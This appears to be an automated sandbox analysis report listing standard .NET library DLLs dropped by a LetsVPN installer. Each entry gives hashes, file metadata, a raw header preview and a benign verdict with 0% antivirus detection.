                                                                                                                                                                                                  SHA-512:026B7C70AC66FC3A53F48317A6C03EF5A2BE5CB1ECD95A5FF931137AB9E823687FFFDBB29D1E56B852093D6DD081AF29CEAE352C86AFC5B1E0F5D47F728AF3ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..P............... ....`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.874636894850293
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W6iIJq56dOuWSKeWLhqWOHlLf2KQcvBZ94tUEiS+ShjmM6IGBkS+RJ:AiAdq3b2KZBZCeFS+ST6nkhJ
                                                                                                                                                                                                  MD5:6F94A6ECF59BB9B2F4F7CA404C0E9AA2
                                                                                                                                                                                                  SHA1:39C51481E7AB3B57789E8EB2E56F29F59DF1C9B9
                                                                                                                                                                                                  SHA-256:F2A09948F8B8B80E3BB165BB68936DCB55545E549D8CBE4E64651A253F67625D
                                                                                                                                                                                                  SHA-512:D64CAE00ABD57973B690D304A33568AC5231A43CF57F33353D675788D2F9268C5327569E3024AC5798A6F6F62C9B0A305A337B1A930DF94FFB76BBA8E033CE20
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ...............................K....@..................................*..O....@.................. ....`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38944
                                                                                                                                                                                                  Entropy (8bit):6.044580550740905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1XDQsPurQcR3y6JOnSHDYFD5q3b2KZBZKS+ST6nkoc/z:1zPtcE6JhHEFo3qK4/mRb
                                                                                                                                                                                                  MD5:7A2E8A66CF511AFD062CC573C2EF4D8D
                                                                                                                                                                                                  SHA1:D2D5EF3B00E83F19126BC8CD55C96D36F8E60F3C
                                                                                                                                                                                                  SHA-256:9941DF3D31B62A3C32FE3239A4F6BC88A92D688F8F95FD335601186C729F8A36
                                                                                                                                                                                                  SHA-512:45076D97149B394A41D71177F27510BBB2D223C12978EFD21964C18B4FFAACF98F21C07ACD5CCF01EDDC1B51CFB4AA017D0C16F85669D2EC62E350045C78D89E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0..Z..........Bx... ........... ..............................d/....@..................................w..O....................j.. ...........8w............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............h..............@..B................"x......H........$...............R.. $...v......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r=..p.(....*2r}..p.(....*2r...p.(....*2r...p.(....*2r%..p.(....*2r]..p.(....*2r...p.(....*2r/..p.(....*2r...p.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.916556938875989
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ynzz+MpSaLWW0+WUhqWOHlLf2KQcvBZ9v6yS+ShjmM6IGBkSlX:kpu8q3b2KZBZDS+ST6nke
                                                                                                                                                                                                  MD5:B86B587463EDAA3768293EDE624B3CD7
                                                                                                                                                                                                  SHA1:EBEA0558A43695AB59EA7F452505CAA2C2F61621
                                                                                                                                                                                                  SHA-256:B1B098D825BC132321187B1C651CA3FB81F5430FCD739166A998459BB35E157A
                                                                                                                                                                                                  SHA-512:DD311019BB290F4D72C431018EE1F5DA966CBC2BADE3C640159E270746F2646E89AD625C0130152BC70AAF89BC89A24AE632821CE36B7F7647FEA8B07B099240
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ..............................0.....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.968791073790615
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGhr+YUfyHxsW/HWJhqWOHlLf2KQcvBZ9zeuBS+ShjmM6IGBkSJmU:Bkmuq3b2KZBZcuBS+ST6nk0mU
                                                                                                                                                                                                  MD5:4EA434032E4ABAE29FFB6623CC92FD24
                                                                                                                                                                                                  SHA1:9851A754766A3DC985969AA1C62C34DB7F3112CF
                                                                                                                                                                                                  SHA-256:B7BA57379B2F6F2DBA310A77A9964A058BE4B125C662F54B415BBB2507A682DF
                                                                                                                                                                                                  SHA-512:63C26140E3AD318142765318D7D5580A0A9A76B1633367D65AFE1CD9A188DE46C5C824D3256F3443A99C97563939728583783676FD8B7D2633D4C9B582DA1E3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ...............................C....@.................................<+..O....@..`............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.90329532098987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WRE+ruiA5vzWeNWfhqWOHlLf2KQcvBZ910IS+ShjmM6IGBkSh9:WS9bGq3b2KZBZYIS+ST6nkw9
                                                                                                                                                                                                  MD5:D4D0F693EA33F9621E425815A6F9540D
                                                                                                                                                                                                  SHA1:D680AF7B9A988EAE6073AB24FD6F48F69053848D
                                                                                                                                                                                                  SHA-256:0E85C39D139060908AAA9BC221BEC2E5E2CCD19A100CD33A472D1351536713FB
                                                                                                                                                                                                  SHA-512:8711DD683104EAAFA0CE8177C657115436DAD214B90C82F8106AC5DF73626F5CD378304956EA36D58FBF738EF907A0A62D24BE920537C70DE70C9757A25584F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ..............................i.....@................................../..O....@..p............... ....`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.959275806967524
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CT+6ywnVvW0LW3hqWOHlLf2KQcvBZ9cFS+ShjmM6IGBkSKM:C99Yq3b2KZBZsS+ST6nkk
                                                                                                                                                                                                  MD5:BF4BDAAF7195B5677D6D287C757B1D35
                                                                                                                                                                                                  SHA1:E4AC328BF66A86A99E123F0C661D3A8C3EF51559
                                                                                                                                                                                                  SHA-256:B5B6C8C0B67D1633BFD6503E9827AEC7350697D0B035D855D5B942A04D52CE73
                                                                                                                                                                                                  SHA-512:E5EED64C20B17443965ECB09ADEE0E9F4DBB0ED15A6F8152C8DB674E92AE8E6891F333AEB2616D5FBC4B870DD23D9ADD8C4B8E8586E67879883BFB8A89B17A4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................Q....@..................................(..O....@.................. ....`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):88608
                                                                                                                                                                                                  Entropy (8bit):5.4435313555375915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i8KGCEPg1QqF3BhejEpvS/ZFQ+2/NVQ8GLa0Uh55T3lEC/IOPbZkxqN4bENZJlfI:lHCXBheNQ+2/NVQ8GLa0Uh55T3lEC/IX
                                                                                                                                                                                                  MD5:3E10881DC5ABA9ECC4364CC059BB8578
                                                                                                                                                                                                  SHA1:403F53E6A4275E4263B62A0EF251A36D4D8497DF
                                                                                                                                                                                                  SHA-256:EBD2D8C1D24C48D1B6A41819F7818C5449EC101857A9C55969B5378C43D9A362
                                                                                                                                                                                                  SHA-512:C1B8984D572D4B84F54249E145A4BF5400DE475598DC0F9094280A39A0B037475D2F59671257B27AE4FECA7332FCEF03646D8A382637F1B50C274AE2CC4BB7F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.. ...........?... ...@....... ....................................`..................................>..O....@...............,.. ....`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......*..............@..B.................>......H....... ,..$...........D....}...=.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948920609937838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1RbzriaXT+WlEW/hqWOHlLf2KQcvBZ9bNS+ShjmM6IGBkSd6C:H7iczq3b2KZBZPS+ST6nko6C
                                                                                                                                                                                                  MD5:9E2EDAE28E5C799121F9D0F05B761B39
                                                                                                                                                                                                  SHA1:98E324B6408BF42BA6E64728D3368E4BD4D5CDC9
                                                                                                                                                                                                  SHA-256:50665BD9288B3F7AC75F9691154CA6CEEC8C990E1BE2B2F34E96E09C597A8C8C
                                                                                                                                                                                                  SHA-512:EA993FAAC3545CAA30A005B915F7739586EDD8CADCD321C1F20A958559974D291A737F83A01E5EA7BF8C0BA20C08D40C05250536EFD875591DE9FFAD3B3CC605
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ...............................+....@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):150048
                                                                                                                                                                                                  Entropy (8bit):5.459404128686192
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:idYO+3m9R6e1x03BZ6bDSzZ8B0uAP+NfX/Y:o+2jv1x0ebezWiuzfA
                                                                                                                                                                                                  MD5:7E966799E708109C423A35B6E3340CF2
                                                                                                                                                                                                  SHA1:0AD32A3EAF26063B19FBF4F22F3EA3D8B49A2024
                                                                                                                                                                                                  SHA-256:70D32B4555F388CF4A63A63CF4048DD16CF5AFD27FCE888A19CEC2DD98641F88
                                                                                                                                                                                                  SHA-512:C3669AEC2EE69ACE5141C93059E0CDBC8D160EF53AB6BE7D019EAFCA40CCAF8AC3772D833CBCC17AD23CA4B6579B90DA0869E97A11CF111E330B525D88B2AC5E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ....................................@..................................,..O....@.................. ....`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83488
                                                                                                                                                                                                  Entropy (8bit):5.98305460524727
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZKsCikxiUPLkOWoYSAkm4fHLofFv9Rit9zzv5dnCsq3b2KZBZbS+ST6nkDL9:VfkxBIOYSq4/2biHrnCn3qKZ/mB9
                                                                                                                                                                                                  MD5:38D22AC2B692ACF76D92A78D6E7C3E70
                                                                                                                                                                                                  SHA1:73BDB1B25A805604E37DA7D97BBCDF0E18EEC6BF
                                                                                                                                                                                                  SHA-256:6A3A2B2EC8E6AD3CC8F0D13F74F4235F8B4655A369BCE8AE2EE6F2D333691FAA
                                                                                                                                                                                                  SHA-512:BA1226BE9B9BDAC47DD568C569AE2DDDCFF588070A25FF497CFA50591BF2DE00C27C04756BC56EC923AE50EFFF4D8B84A7745FBCFB583D4E92BBC0B48B710B2D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............&*... ...@....... ...............................z....`..................................)..O....@.................. ....`.......(..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........(...I..........0r..@...p(.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101408
                                                                                                                                                                                                  Entropy (8bit):5.839974107688984
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:q+kZKluk7ZFrtpAauVXrbtYC/xBu9L43qKj/mR:q+kzk7p4rbtYC/xBO4X/u
                                                                                                                                                                                                  MD5:17826E6B5B3FC50085AA80138A8718E6
                                                                                                                                                                                                  SHA1:DF573ABF9B431649FC0ED53DEBDF2E7FC3A9E270
                                                                                                                                                                                                  SHA-256:EF3D0790B048EA6A322743E69A5FDBD636B4034A2CB3CE988EA1B336E15D8EF6
                                                                                                                                                                                                  SHA-512:D5CAA4D0A5C7016B918C92FDFDFB619BD1CE98D71B7C9AB25983D1FD359460A44F4C64C94C241F18C805B1F10BAA134F57CA327ADA2D9302F8C5121D6AA6F769
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..R...........p... ........... ....................................`..................................o..O....................^.. ............n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............\..............@..B.................o......H........*...^..................Pn.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):225312
                                                                                                                                                                                                  Entropy (8bit):5.699948129437032
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:+XFpBZBJL3rBxad7/bAkGF60FhFoFmF8cjcsc4FEFbFgcbFmFiF6FhFuFBFuFDFz:OFRf60FhFoFmF8cjcsc4FEFbFgcbFmFz
                                                                                                                                                                                                  MD5:167F70DEA1E5182A5AB8A28413152050
                                                                                                                                                                                                  SHA1:E961CAE2EF1FD6B104F9699D32A0F7919D45ED5F
                                                                                                                                                                                                  SHA-256:0491ACB4AB821BF901A0BD9525B15640F6CFDC787E9F124D5A2F6D208D506C79
                                                                                                                                                                                                  SHA-512:0D70FA751AAD11A8929A373477A1F9B6B2D4792565952B95DE29D437C3CF49AE3511109F15E82C2C7B2BB65DE8C7BDEC677851C5DDAA8DAE2245A4F4B30A6ED4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..8...........W... ...`....... ...............................f....`..................................V..O....`...............B.. ............V..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H.......h7..............@...XW...U........................................*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%....(....*......(....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.926137740956502
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ARtRWjYWVhqWOHlLf2KQcvBZ9UFsS+ShjmM6IGBkSA:aipq3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:EADAE034DAA706B67962523E70B9413B
                                                                                                                                                                                                  SHA1:B066C495D1D0537E8FFBD25ADB8C4DEDF8AA2D84
                                                                                                                                                                                                  SHA-256:0C42D4083BCF4317F9758594D3707FCC9DB8E5C22671A58D533B18BF45B1ADF1
                                                                                                                                                                                                  SHA-512:A485F19ED60EE72EE6C697646C5DA34CAC7AE6EF97EF689AD5706C13E284901DC988BF77422DCC01866C8B1A771B5A4259E198E3185007CE6B7364EB608EE94C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................jm....@.................................x*..O....@..@............... ....`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9935188579764525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WeWnoWJhqWOHlLf2KQcvBZ9pM9S+ShjmM6IGBkSpqH:Wnpq3b2KZBZGS+ST6nk3H
                                                                                                                                                                                                  MD5:258B30BAD31A634788ADCE0968A95E69
                                                                                                                                                                                                  SHA1:13ED037797D8283CA176C3DB00E93B2182039D7E
                                                                                                                                                                                                  SHA-256:E5D1B116F6B5206463449683167E9ECCC3CFF8626BBE1CAAF7834C6355D27FDF
                                                                                                                                                                                                  SHA-512:3471F04AD313A453BE4AD8116D2CE6B2A2D32630348D906E48862D89F22C221CDB44F57BA87FED1E57D1DC7B7E95A1D9080B4D07793F48D800EC9F3C16D76F5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
